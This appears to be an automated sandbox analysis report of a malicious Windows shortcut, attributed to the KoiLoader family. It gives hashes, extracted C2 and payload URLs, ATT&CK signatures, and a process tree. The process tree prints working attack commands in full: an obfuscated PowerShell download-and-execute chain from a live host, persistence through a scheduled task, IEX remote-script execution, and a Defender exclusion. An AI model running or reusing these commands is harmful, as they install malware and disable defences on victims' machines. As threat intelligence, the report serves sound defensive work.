Analysis

  • max time kernel
    116s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 10:06

General

  • Target

    chase_march_2025.lnk

  • Size

    1KB

  • MD5

    c8819ed5f7f4a9b309e01db14b458a60

  • SHA1

    1b78c2b3627814971f73c7fa2696d1119154ea07

  • SHA256

    5d736786036eeeaeb7a7c8b3652c76ca4c61a845619004e0b9bb679971da6a48

  • SHA512

    72e7d619453b60df925f2f593bb9ff3156c717e97354f1de6025f9de67c8ec7713dccc01988928072b271f20eca35168023fed06f084376db47b2a07be424f78

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://studiolegaledesanctis.eu/wp-content/uploads/2024/07

Extracted

Family

koiloader

C2

http://217.156.66.15/gnathopoda.php

Attributes
  • payload_url

    https://studiolegaledesanctis.eu/wp-content/uploads/2024/07

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Koiloader family
  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\chase_march_2025.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('1o6gjltxwxrjzt.js w2tvvf08m'); $getf='Dow'+'nl'+'oadF'+'ile'; $ri6muz5x1g1rk = New-Object Net.WebClient; $wscs = 'wscript '; $ri6muz5x1g1rk.$getf('https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/ventage3a.php', '1o6gjltxwxrjzt.js'); . ('curl.e'+'xe') -s -o fv8jwiyi037p 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/caginessEBuk.php'; mv fv8jwiyi037p 'w2tvvf08m.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn w2tvvf08m;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4516
      • C:\Windows\system32\curl.exe
        "C:\Windows\system32\curl.exe" -s -o fv8jwiyi037p https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/caginessEBuk.php
        3⤵
          PID:5828
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\1o6gjltxwxrjzt.js w2tvvf08m" /tn w2tvvf08m
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5324
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\ProgramData\1o6gjltxwxrjzt.js w2tvvf08m
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn w2tvvf08m /f; wscript $env:programdata\w2tvvf08m.js "
        2⤵
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1048
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn w2tvvf08m /f
          3⤵
            PID:2264
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\w2tvvf08m.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:5612
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7zHAE4MXHXFA'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/uratic58o.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/shepherdess1Hwn.ps1'))"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:6112
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/sd2.ps1')"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command IEX(IWR -UseBasicParsing 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/sd2.ps1')
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1132
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        1⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5804
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:6032
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5504
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r446d0502-ee25-49d3-945d-920c328ed118r.js"
        1⤵
          PID:4852

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\1o6gjltxwxrjzt.js

          Filesize

          198B

          MD5

          af9f1f2076317c03e21d56367e638af4

          SHA1

          61c4f850591f851acd3108104ef14f0fe32f95a6

          SHA256

          70835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1

          SHA512

          c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c

        • C:\ProgramData\fv8jwiyi037p

          Filesize

          1KB

          MD5

          66422f78176819498663cffedaa93efb

          SHA1

          cd3a9e9c5e7ea8572b3f7d0233026cf5f5ef7984

          SHA256

          01b4a4b590035f311d4a8471b1c29f0082b6632b238821fc06d9532d29fd06d3

          SHA512

          d100e22177bb28320864409b454ec358c1541d40ddccc9ce4a08b9c4f6c6981a1dc7add1c66a1911425977b6895b62c383fa1436ac51deaea988dcb59829aa5e

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          556084f2c6d459c116a69d6fedcc4105

          SHA1

          633e89b9a1e77942d822d14de6708430a3944dbc

          SHA256

          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

          SHA512

          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          19KB

          MD5

          9cc248cf957a372294d6f457bc6e1458

          SHA1

          ef3a18e45288dbbe95660e97228b8a0b8ea82221

          SHA256

          aca67397df01161534b4f1ea54e91f03b6d2939f95373f78565b5c3cd13b508f

          SHA512

          20b2ed256f0baa858b1c0e03418762739c90b8ebd4e930c1912e272542eea7d301afdae7f795c2d35abbab2f512786103888af032ad7cca460a38a19ff85465a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          6ee98024356ee77e9b3383df31956cf7

          SHA1

          2ea17db0409146b79b59f2feee50476c8e77fe4d

          SHA256

          937461e9fe8bf1e13d9f73aa2aa93a7dd2ba8f66b98576f6eca55790ca0eafe4

          SHA512

          171c1ecbd2b319e29eed5446a7a90523dbb024d79d6fe029fc84499d773669cb406205fd2a84e498e746e4581da6c82de6b1cfc7bd9549734e01257b02a67312

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          1a11402783a8686e08f8fa987dd07bca

          SHA1

          580df3865059f4e2d8be10644590317336d146ce

          SHA256

          9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

          SHA512

          5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qttgsaa0.1az.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1132-103-0x0000000007C20000-0x0000000007C70000-memory.dmp

          Filesize

          320KB

        • memory/1132-100-0x00000000073D0000-0x00000000073F2000-memory.dmp

          Filesize

          136KB

        • memory/1132-104-0x0000000007D10000-0x0000000007DA2000-memory.dmp

          Filesize

          584KB

        • memory/1132-102-0x0000000007B90000-0x0000000007BAA000-memory.dmp

          Filesize

          104KB

        • memory/1132-101-0x0000000008140000-0x00000000086E4000-memory.dmp

          Filesize

          5.6MB

        • memory/4516-2-0x00007FFAA4043000-0x00007FFAA4045000-memory.dmp

          Filesize

          8KB

        • memory/4516-14-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

          Filesize

          10.8MB

        • memory/4516-13-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

          Filesize

          10.8MB

        • memory/4516-20-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

          Filesize

          10.8MB

        • memory/4516-12-0x0000012CCBA40000-0x0000012CCBA62000-memory.dmp

          Filesize

          136KB

        • memory/5504-97-0x00000000076E0000-0x00000000076E8000-memory.dmp

          Filesize

          32KB

        • memory/5504-84-0x00000000075C0000-0x00000000075D1000-memory.dmp

          Filesize

          68KB

        • memory/5504-96-0x0000000007700000-0x000000000771A000-memory.dmp

          Filesize

          104KB

        • memory/5504-95-0x0000000007600000-0x0000000007614000-memory.dmp

          Filesize

          80KB

        • memory/5504-94-0x00000000075F0000-0x00000000075FE000-memory.dmp

          Filesize

          56KB

        • memory/5504-69-0x0000000007030000-0x0000000007062000-memory.dmp

          Filesize

          200KB

        • memory/5504-70-0x0000000070610000-0x000000007065C000-memory.dmp

          Filesize

          304KB

        • memory/5504-80-0x0000000007070000-0x000000000708E000-memory.dmp

          Filesize

          120KB

        • memory/5504-81-0x0000000007090000-0x0000000007133000-memory.dmp

          Filesize

          652KB

        • memory/5504-82-0x0000000007430000-0x000000000743A000-memory.dmp

          Filesize

          40KB

        • memory/5504-83-0x0000000007640000-0x00000000076D6000-memory.dmp

          Filesize

          600KB

        • memory/6112-35-0x0000000003230000-0x0000000003266000-memory.dmp

          Filesize

          216KB

        • memory/6112-56-0x0000000007D70000-0x0000000007D7D000-memory.dmp

          Filesize

          52KB

        • memory/6112-55-0x0000000007CD0000-0x0000000007CD1000-memory.dmp

          Filesize

          4KB

        • memory/6112-54-0x0000000007E70000-0x00000000084EA000-memory.dmp

          Filesize

          6.5MB

        • memory/6112-53-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

          Filesize

          104KB

        • memory/6112-52-0x0000000006820000-0x000000000686C000-memory.dmp

          Filesize

          304KB

        • memory/6112-51-0x00000000067E0000-0x00000000067FE000-memory.dmp

          Filesize

          120KB

        • memory/6112-49-0x0000000006210000-0x0000000006564000-memory.dmp

          Filesize

          3.3MB

        • memory/6112-39-0x0000000005990000-0x00000000059F6000-memory.dmp

          Filesize

          408KB

        • memory/6112-38-0x00000000058B0000-0x0000000005916000-memory.dmp

          Filesize

          408KB

        • memory/6112-37-0x0000000005810000-0x0000000005832000-memory.dmp

          Filesize

          136KB

        • memory/6112-36-0x0000000005A20000-0x0000000006048000-memory.dmp

          Filesize

          6.2MB